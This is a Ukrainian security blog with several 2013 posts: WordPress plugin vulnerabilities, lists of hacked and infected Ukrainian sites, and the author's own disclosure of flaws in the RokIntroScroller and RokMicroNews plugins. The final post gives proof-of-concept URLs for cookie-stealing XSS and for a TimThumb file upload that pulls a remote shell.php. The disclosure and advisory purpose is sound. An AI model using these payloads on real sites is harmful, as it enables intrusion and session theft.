Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Mukioplayer, Design-Approval-System та Simple Dropbox. Для котрих з’явилися експлоіти. Mukioplayer - це медіа плеєр, Design-Approval-System - це плагін для розгляду дизайнів, Simple Dropbox - це плагін для інтеграції з Dropbox.

• WordPress Mukioplayer 1.6 SQL Injection (деталі)
• WordPress Design-Approval-System 3.6 Cross Site Scripting (деталі)
• WordPress Simple Dropbox 1.8.8 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.dec.gov.ua (хакером HighTech) - 04.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://book.rekord.gov.ua (хакером SultanHaikal) - 06.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://kievlyanenews.com.ua (хакером dr.m1st3r)
• http://веселка.com.ua (хакером dr.m1st3r)
• http://blog.arhstudio-f.com (хакером dr.m1st3r)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://kharkivoda.gov.ua - інфікований державний сайт - інфекція була виявлена 14.08.2013. Зараз сайт не входить до переліку підозрілих.
• http://nokino.com.ua - інфекція була виявлена 15.09.2013. Зараз сайт не входить до переліку підозрілих.
• http://vanilin.com.ua - інфекція була виявлена 08.10.2013. Зараз сайт входить до переліку підозрілих.
• http://i.ua - інфекція була виявлена 08.10.2013. Зараз сайт не входить до переліку підозрілих.
• http://a-counter.com - інфекція була виявлена 09.10.2013. Зараз сайт не входить до переліку підозрілих.

У версії WordPress 3.6 розробники виправили декілька уразливостей. Але про них розробники WP навмисно не повідомили (для применшення офіційної кількості виправлених дірок).

В цьому місяці я дослідив зміни в версії 3.6 движка і виявив Full path disclosure уразливості в адмінці. Про які не згадали в описі релізу WP 3.6, але згадали про них в Codex серед виправлених багів (при тому, що вони іноді згадують про FPD в анонсах релізів). Що типово для розробників WP - ще з 2007 року вони часто приховують виправлені уразливості.

Раніше я вже писав про уразливості в WordPress та Akismet.

Full path disclosure (WASC-13):

В Media Library якщо атачмент не має батька.
В функції parent_dropdown().
В функції wp_new_comment().
В функції mb_internal_encoding().
При обробці метаданих зображень.
В функції get_post_type_archive_feed_link().
В функції WP_Image_Editor::multi_resize().
В функції wp_generate_attachment_metadata().
При видаленні або відновленні елемента, що вже не існує.

Уразливі WordPress 3.5.2 та попередні версії.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.nsj.gov.ua (хакерами з @Df Brazil Hack Team) - 11.09.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.tsdazu.gov.ua (хакером Error7rB) - 13.09.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ekonomics.com.ua (хакером dr.m1st3r)
• http://ecopsycholog.com (хакерами Arddzz і A’Rui)
• http://isol-pack.com.ua (хакером Hmei7) - 16.09.2013, зараз сайт вже виправлений адмінами

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах IndiaNIC Testimonia, NextGen Smooth Gallery та Event Easy Calendar. Для котрих з’явилися експлоіти. IndiaNIC Testimonia - це плагін для написання рецензій, NextGen Smooth Gallery - це плагін для створення галереї зображень, Event Easy Calendar - це плагін для створення календаря на сайті.

• WordPress IndiaNIC Testimonial 2.2 XSS / CSRF / SQL Injection (деталі)
• WordPress NextGen Smooth Gallery Cross Site Scripting (деталі)
• WordPress Event Easy Calendar 1.0.0 XSS / CSRF / Input Validation (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://crimea-pfu.gov.ua - інфікований державний сайт - інфекція була виявлена 02.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://brokservis.zp.ua - інфекція була виявлена 12.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://advocard.odessa.ua - інфекція була виявлена 27.06.2013. Зараз сайт входить до переліку підозрілих.
• http://euroavto.in - інфекція була виявлена 07.09.2013. Зараз сайт не входить до переліку підозрілих.
• http://sommer.kiev.ua - інфекція була виявлена 16.07.2013. Зараз сайт не входить до переліку підозрілих.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://clinic-1.gov.ua (хакером klod fajraoui) - 03.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://sumy-city.upszn-sumy.gov.ua (хакером Hmei7) - 06.09.2013 - похаканий державний сайт, зараз сайт не працює
• http://denaks.com (хакером Sejeal) - 10.08.2013, зараз сайт вже виправлений адмінами
• http://www.union-forum.org (хакером BLACKWOLF) - 19.08.2013, зараз сайт вже виправлений адмінами
• http://globalenglish.dn.ua (хакером RBG HomS) - 23.08.2013, зараз сайт вже виправлений адмінами

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах silverOrchid, Encrypted Blog та Wordfence. Для котрих з’явилися експлоіти. silverOrchid - це тема движка, Encrypted Blog - це плагін для шифрування блогу, Wordfence - це секюріті плагін для WordPress. Раніше я вже знаходив уразливості в Wordfence Security і пропонував розробнику провести аудит його плагіна, але він відмовився, тому зовсім не дивні повідомлення про нові уразливості в цьому плагіні.

• WordPress silverOrchid Cross Site Scripting (деталі)
• WordPress Encrypted Blog 0.0.6.2 XSS / Open Redirect (деталі)
• WordPress Wordfence 3.8.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Торік я писав про численні уразливості в Rokbox для WordPress. А минулого тижня я виявив численні уразливості в плагінах RokIntroScroller і RokMicroNews для WordPress. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості.

Стосовно плагінів для WordPress раніше я писав про уразливості в RokStories і RokNewsPager.

В цих плагінах для WordPress використовуються TimThumb (окрім Rokbox, розробники включили його в інші свої плагіни). Тому вони мають всі дірки TimThumb, які я оприлюднив ще в 2011 році.

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

А також FPD, Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок.

AFU (WASC-31):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://flickr.com.site.com/shell.php
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://flickr.com.site.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php
http://site/wp-content/plugins/wp_rokmicronews/rokmicronews.php

Вразливі RokIntroScroller 1.8 і попередні версії та RokMicroNews 1.5 і попередні версії. А до останньої FPD вразливі всі версії плагінів RokIntroScroller та RokMicroNews.